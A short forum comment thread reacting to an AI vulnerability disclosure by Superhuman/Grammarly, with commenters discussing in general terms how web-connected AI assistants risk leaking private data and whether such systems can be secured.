| ▲ | sarelta a day ago |
| I'm impressed Superhuman seems to have handled this so well - lots of big names are fumbling with AI vuln disclosures. Grammarly is not necessarily who I would have bet on to get it right |
|
| ▲ | empiko 19 hours ago | parent | next [-] |
| I wonder how they handled it. Everybody's connecfing their AI to the Web, but it automatically means that any data AI has access to can be extracted by the attacker. The only safe way forward is to 1. disconnect the Web or 2. perhaps to filter the generated URLs aggressively. |
| |
| ▲ | ttoinou 19 hours ago | parent | next [-] | | We should have a clearer view of permissions of the AI, operations it does, and have one button per day to accept/deny operations from given data. Instead of auto approval. | |
| ▲ | wat10000 5 hours ago | parent | prev [-] | | Private data, untrusted data, communication: an LLM can safely have two of these, but never all three. Browsing the web is both communication and untrusted data, so it must never have access to any trusted data if it has the ability to browse the web. The problem is, so much of what people want from these things involves having all three. | | |
| ▲ | TeMPOraL 5 hours ago | parent [-] | | > The problem is, so much of what people want from these things involves having all three. Pretty much. Also there's no way of "securing" LLMs without destroying the quality that makes them interesting and useful in the first place. I'm putting "securing" in scare quotes because IMO it's fool's errand to even try - LLMs are fundamentally not securable like regular, narrow-purpose software, and should not be treated as such. |
|
|
|
| ▲ | djaouen 3 hours ago | parent | prev [-] |
| Are you f*cking kidding me? Grammarly is like the best one! |